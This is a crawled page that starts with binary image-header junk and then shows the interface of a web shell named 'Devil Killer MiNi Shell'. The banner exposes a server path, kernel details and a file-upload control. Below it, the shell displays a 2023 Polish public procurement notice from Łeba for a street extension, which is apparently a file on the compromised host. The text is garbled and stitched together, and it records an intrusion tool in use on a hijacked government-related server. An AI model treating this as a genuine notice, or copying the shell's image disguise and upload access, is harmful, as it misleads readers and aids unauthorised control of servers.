JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230425/0019035701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa przedłużenia ul. Piotra Wysockiego w Łebie na wschód od Alei Św. Jakuba </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Łeba</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979743</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 90</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łeba</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">59 8661 510</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">59 8661 337</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@leba.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://leba.um.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa przedłużenia ul. Piotra Wysockiego w Łebie na wschód od Alei Św. Jakuba </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0db71455-e334-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00190357</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00032975/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Budowa przedłużenia ul. Wysockiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/leba <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/leba</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy zakupowej<br/>dostępnej pod adresem: https://platformazakupowa.pl/pn/leba<br/>2. Zaleca się, aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, posiadał konto na<br/>platformie zakupowej. Rejestracja oraz logowanie dostępne jest pod adresem: https://platformazakupowa.pl/pn/leba Korzystanie z<br/>Platformy przez Wykonawcę jest bezpłatne.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu,<br/>opisane zostały w Regulaminie korzystania z platformy zakupowej dostępnym pod adresem: https://platformazakupowa.pl/strona/1-<br/>regulamin.<br/>4. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>platformy zakupowej, określone w Regulaminie dostępnym pod adresem: https://platformazakupowa.pl/strona/1-regulamin.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do<br/>komunikacji wynosi 150MB.<br/>6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych środków dowodowych,<br/>przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu,<br/>przyjmuje się datę ich przekazania na platformę zakupową.<br/>7. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty)<br/>odbywa się elektronicznie za pośrednictwem platformy zakupowej i formularza Wyślij wiadomość. Korespondencja przesłana za<br/>pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem<br/>Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP)<br/>8. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>iwona.mielewczyk@leba.eu.<br/>9. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę jako<br/>załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres email: iwona.mielewczyk@leba.eu. Sposób<br/>sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1.<br/>administratorem Pani/Pana danych osobowych jest Urząd Miejski w Łebie, ul.Kościuszki 90, 84-360 Łeba, tel. 598661510;<br/>2.<br/>inspektorem ochrony danych osobowych w Urzędzie Miejskim w Łebie jest Pan Radosław Czyżewski, kontakt: adres e-mail:<br/>radoslaw.czyzewski@leba.eu, telefon 59 8661 510 wew. 44;<br/>3.<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem<br/>o udzielenie zamówienia publicznego;<br/>4.<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843 z<br/>późn. zm.), dalej „ustawa Pzp”;5.<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6.<br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>7.<br/>w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>8.<br/>posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.9.2023.IM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 428460,98 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest Budowa przedłużenia ul. Piotra Wysockiego w Łebie na wschód od Alei Św. Jakuba.<br/>2. Prace należy wykonać na podstawie dokumentacji projektowej wykonanej przez Usługi Projektowe Marek Skiba, ul. Chałubińskiego 22a/4, 75-581 Koszalin oraz przez Projektowanie i Nadzory Zbigniew Wysokiński, ul. E. Plater 14a/4, 84-300 Lębork. Dokumentacje projektowe stanowią załącznik nr 8 do niniejszej SWZ.<br/>3. Szczegółowy zakres w/w prac do wykonania, określony został w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót, które stanowią załącznik nr 8 SWZ.<br/>Dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót oraz opis przedmiotu<br/>zamówienia znajdujący się w SWZ obejmują całość zadania inwestycyjnego.<br/>Wykonawca w zakresie zadania wystąpi własnym kosztem i staraniem o uaktualnienie decyzji<br/>i uzgodnień, które utraciły lub utracą ważność podczas wykonywania prac, poprzez przygotowanie<br/>właściwych dokumentów, wykonanie uzgodnień i uzyskanie aktualnych decyzji, uzgodnień i opinii.<br/>Wykonawca w ramach zadania wykona zjazdy oraz wejścia do dz. nr 1737 do dz. nr 822/15<br/>zgodnie z załącznikiem nr 8.<br/>Wykonawca obowiązany jest dostosować niweletę wykonywanej drogi do rzędnych budynków<br/>istniejących wzdłuż drogi.<br/>Wykonawca w ramach zadania obowiązany jest do opracowania, uzgodnienia projektu SOR,<br/>a następnie do wprowadzenia SOR.<br/>Oświetlenie uliczne należy wykonać zgodnie z dokumentacją projektową jednak dokonać<br/>przyłączenia do sieci elektroenergetycznej w miejscach wskazanych przez Zamawiającego na<br/>ul. Al. Św. Jakuba.<br/>Wykonawca ma obowiązek poinformowania właściwych gestorów sieci i urządzeń o rozpoczęciu<br/>prac.<br/>Wykonawca w ramach wykonywanego zamówienia zamontuje kosz do każdego wpustu ulicznego kanalizacji deszczowej. <br/>Wykonawca w ramach zadania dostarczy 6 ławek i 6 koszy na śmieci oraz ustawi w miejscach wskazanych przez Zamawiającego.<br/>Uliczne wpusty kanalizacji deszczowej z osadnikiem zwieńczone muszą być uliczną kratą żeliwną<br/>wyposażoną w zawiasy utrudniające kradzieże.<br/>Wykonawca w ramach zamówienia, zakupi i zamontuje własnym kosztem i staraniem, na każdym<br/>słupie oświetleniowym podwójny uchwyt na flagi w kolorze lampy.<br/>Wszelkie koszty związane z prowadzeniem robót, wykonaniem uzgodnień na czas trwania robót,<br/>zajęciem terenu na czas trwania robót, pokrywa Wykonawca.<br/>Wykonawca wykona prace w podziale na etapy uzgodnione z Zamawiającym. Wykonawca<br/>zabezpieczy materiały i sprzęt zgromadzone na cele budowy przed dostępem osób trzecich.<br/>Zamawiający dopuszcza ujęcie w ofercie, a następnie wbudowanie rozwiązań równoważnych<br/>polegających na zastosowaniu innych materiałów i urządzeń niż podane w dokumentacji<br/>projektowej pod warunkiem zapewnienia wszystkich parametrów nie gorszych niż określone w tej<br/>dokumentacji. W takiej sytuacji Zamawiający wymaga, zgodnie z art. 101 ust. 5 Pzp złożenia<br/>stosownych dokumentów, uwiarygodniających równoważność tych materiałów i urządzeń. Złożone<br/>ww. dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi<br/>stosowną opinię. Opinia ta będzie podstawą do podjęcia przez Zamawiającego decyzji o przyjęciu<br/>oferty lub jej odrzuceniu z powodu „nierównoważności” zaproponowanych rozwiązań<br/>równoważnych. W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów o zastosowaniu<br/>innych materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty ujęto materiały<br/>i urządzenia zaproponowane w dokumentacji projektowej. Pod pojęciem „parametry” rozumie się<br/>funkcjonalność, przeznaczenie, kolorystykę, strukturę, rodzaj materiału, kształt, wielkość,<br/>bezpieczeństwo, wytrzymałość oraz pozostałe parametry przypisane poszczególnym materiałom<br/>i urządzeniom w Dokumentacji projektowej. Dopisuje się wyraz „lub równoważny” do wszystkich<br/>nazw, znaków towarowych, patentów lub pochodzenia wskazanych w Dokumentacji projektowej.<br/>Wszystkie zapisy SWZ należy rozpatrywać łącznie z opisem technicznym zawartym<br/>w Dokumentacji projektowej. W sytuacji, gdy wymagania w SWZ przekraczają wymagania zawarte<br/>w normach zastosowanie mają postanowienia zawarte w SWZ.<br/>Załączone do SWZ przedmiary robót nie są obowiązujące i stanowią jedynie materiał<br/>pomocniczy dla Wykonawcy, który w celu opracowania oferty winien opracować własny<br/>przedmiar robót opierając się na projekcie dokumentacji budowlanej.<br/>Zasilanie terenu budowy w energię elektryczną i wodę oraz odbiór odpadów i nieczystości<br/>Wykonawca zobowiązany będzie wykonać na własny koszt i własnym staraniem.<br/>Wykonawca ma obowiązek zabezpieczyć materiały rozbiórkowe w taki sposób, aby mogły one być<br/>wykorzystane do ponownego wykorzystania. W szczególności dotyczy to krawężników, kostki<br/>drogowej, płytek, oznakowania drogowego i słupów oświetleniowych. Rozbiórka nawierzchni<br/>asfaltowych ma nastąpić w taki sposób aby powstały z rozbiórki materiał Zamawiający mógł<br/>wykorzystać powtórnie. Wykonawca ma obowiązek zdać powstały materiał protokolarnie<br/>z uwzględnieniem jego rodzaju i ilości, lub wbudować ponownie po zakończeniu prac jako<br/>odtworzenie nawierzchni.<br/>Wykonawca ma obowiązek wykonania i wprowadzenia czasowej organizacji ruchu na czas trwania<br/>prac w rejonach ulic. Konieczne jest zapewnienie ciągłego dojazdu do posesji dla mieszkańców<br/>ulicy i służb ratunkowych. Dopuszcza się czasowe i krótkotrwałe zamknięcia przejezdności po<br/>wcześniejszym zawiadomieniu mieszkańców i Zamawiającego z określeniem czasu zamknięcia<br/>i wprowadzeniem właściwej czasowej organizacji ruchu.<br/>4. Wykonawca ma obowiązek wykonania i zamontowania 2 tablic informacyjnych zgodnych<br/>z wytycznymi programu Rządowego Funduszu Rozwoju Dróg w miejscach wskazanych przez<br/>Zamawiającego.<br/>Wykonawca zapewni obsługę budowy: kierownika budowy w branży drogowej oraz kierowników<br/>robót we właściwych branżach.<br/>5. Zamawiający dopuszcza powierzenie wykonania części zamówienia Podwykonawcy.<br/>Zamawiający nie zastrzega obowiązku wykonania przez wykonawcę kluczowych zadań.<br/>6. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, których<br/>wykonanie powierzy Podwykonawcom, oraz podania nazw ewentualnych Podwykonawców, jeżeli<br/>są już znani.<br/>7. Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez wykonawcę lub<br/>podwykonawcę osób do wykonywania wskazanych poniżej czynności w trakcie realizacji<br/>zamówienia:<br/> pracami przygotowawczymi, w tym rozbiórkowymi i odtworzeniowymi konstrukcji oraz<br/>nawierzchni,<br/> robotami nawierzchniowymi związanymi z asfaltowaniem oraz układaniem nawierzchni<br/>betonowych i kamiennych,<br/> budową sieci i przyłączy kanalizacji deszczowej, elektrycznej, telekomunikacyjnej,<br/>wodociągowej i kanalizacji sanitarnej oraz usuwaniem kolizji na sieciach oraz pracami<br/>wykończeniowymi na sieciach i przyłączach oraz studniach,<br/> pracami związanymi z ustawieniem oświetlenia oraz innymi pracami w zakresie elektryki,<br/> pracami montażu obiektów małej architektury, znaków drogowych oraz pracami<br/>wykończeniowymi,<br/> pracami wykończeniowymi.<br/>8. W trakcie realizacji zamówienia zamawiający uprawniony jest do wykonywania czynności<br/>kontrolnych wobec wykonawcy odnośnie spełniania przez wykonawcę lub podwykonawcę wymogu<br/>zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 7 czynności.<br/>Zamawiający uprawniony jest w szczególności do:<br/>a) żądania oświadczeń i dokumentów w zakresie potwierdzenia spełniania ww. wymogów<br/>i dokonywania ich oceny,<br/>b) żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww.<br/>wymogów,<br/>c) przeprowadzania kontroli na miejscu wykonywania świadczenia.<br/>9. W trakcie realizacji zamówienia na każde wezwanie zamawiającego w wyznaczonym w tym<br/>wezwaniu terminie wykonawca przedłoży zamawiającemu wskazane poniżej dowody w celu<br/>potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez wykonawcę lub<br/>podwykonawcę osób wykonujących wskazane w punkcie 7 czynności w trakcie realizacji<br/>zamówienia:<br/> oświadczenie wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób<br/>wykonujących czynności, których dotyczy wezwanie zamawiającego. Oświadczenie to powinno<br/>zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę<br/>złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby<br/>zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, imion<br/>i nazwisk tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do<br/>złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy;<br/> poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę<br/>kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności,<br/>których dotyczy ww. oświadczenie wykonawcy lub podwykonawcy (wraz z dokumentem<br/>regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna<br/>zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników,<br/>zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz. U. z<br/>2018 r., poz. 1000) (tj. w szczególności bez adresów, nr PESEL pracowników). Imię i nazwisko<br/>pracownika nie podlega anonimizacji. Informacje takie jak: data zawarcia umowy, rodzaj umowy<br/>o pracę i wymiar etatu powinny być możliwe do zidentyfikowania;<br/> zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez wykonawcę lub<br/>podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na<br/>podstawie umów o pracę za ostatni okres rozliczeniowy;<br/> poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę<br/>kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń,<br/>zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z<br/>przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz. U. z 2018 r., poz.<br/>1000). Imię i nazwisko pracownika nie podlega anonimizacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">161 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span 